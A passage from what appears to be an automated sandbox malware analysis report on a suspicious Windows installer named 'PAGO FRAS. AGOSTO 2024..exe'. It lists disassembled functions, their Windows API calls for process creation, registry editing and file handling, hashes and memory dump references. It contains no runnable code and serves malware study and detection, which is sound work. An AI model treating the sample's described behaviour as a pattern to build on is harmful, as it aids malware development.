                                                                              • Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                              • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                • Part of subcall function 00403F60: SendMessageA.USER32(0001048C,00000000,00000000,00000000), ref: 00403F72
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                              • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                              • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                              • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                              • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                              Strings
                                                                              • Error launching installer, xrefs: 004054D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                              • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                              • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                              • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                              APIs
                                                                                • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 3521207402-0
                                                                              • Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                              • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                              • Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                              • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                              APIs
                                                                                • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                              • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                              • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                              • Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                              • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                              • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                              • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                              • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                              APIs
                                                                                • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteOpenValue
                                                                              • String ID:
                                                                              • API String ID: 849931509-0
                                                                              • Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                              • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                              • Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                              • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                              APIs
                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                                              • String ID:
                                                                              • API String ID: 1938659011-0
                                                                              • Opcode ID: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                              • Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
                                                                              • Opcode Fuzzy Hash: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                              • Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2547128583-0
                                                                              • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                              • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                              • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                              • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                              APIs
                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004059A6
                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                              • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                              • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                              • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                              APIs
                                                                              • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                              • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                              • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                              • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                              APIs
                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                              • GetLastError.KERNEL32 ref: 0040549F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                              • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                              • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                              • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                              • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                              • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                              • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
